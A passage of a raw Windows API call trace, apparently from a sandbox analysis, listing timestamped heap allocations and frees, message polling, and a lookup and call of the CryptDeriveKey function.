0x2e54d68 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.522] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.522] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0209.522] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0209.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0209.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0209.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c68 [0209.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.584] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0209.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0209.585] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0209.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0209.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0209.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0209.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0209.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0209.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0209.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0209.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 